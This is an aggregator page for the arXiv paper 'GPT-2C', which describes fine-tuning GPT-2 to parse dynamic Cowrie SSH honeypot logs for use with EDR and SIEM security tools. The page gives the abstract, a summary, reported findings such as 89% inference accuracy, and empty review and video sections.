GPT-2C: A GPT-2 parser for Cowrie honeypot logs

Febrian Setianto; Erion Tsani; Fatima Sadiq; Georgios Domalis,; Dimitris Tsakalidis; Panos Kostakos

arXiv:2109.06595·cs.CR·September 16, 2021·5 cites

GPT-2C: A GPT-2 parser for Cowrie honeypot logs

Febrian Setianto, Erion Tsani, Fatima Sadiq, Georgios Domalis,, Dimitris Tsakalidis, Panos Kostakos

PDF

Open Access

TL;DR

This paper introduces GPT-2C, a system that uses a fine-tuned GPT-2 model to accurately parse dynamic logs from Cowrie SSH honeypots, improving interoperability with security tools.

Contribution

The paper presents a novel GPT-2 based parser specifically designed for dynamic honeypot logs, achieving high accuracy and real-time performance.

Findings

01

89% inference accuracy on honeypot logs

02

Effective parsing of dynamic user-generated content

03

Acceptable latency for real-time analysis

Abstract

Deception technologies like honeypots produce comprehensive log reports, but often lack interoperability with EDR and SIEM technologies. A key bottleneck is that existing information transformation plugins perform well on static logs (e.g. geolocation), but face limitations when it comes to parsing dynamic log topics (e.g. user-generated content). In this paper, we present a run-time system (GPT-2C) that leverages large pre-trained models (GPT-2) to parse dynamic logs generate by a Cowrie SSH honeypot. Our fine-tuned model achieves 89\% inference accuracy in the new domain and demonstrates acceptable execution latency.

Peer Reviews

No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.

Videos

No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.

Taxonomy

TopicsSoftware System Performance and Reliability · Software Testing and Debugging Techniques · Network Security and Intrusion Detection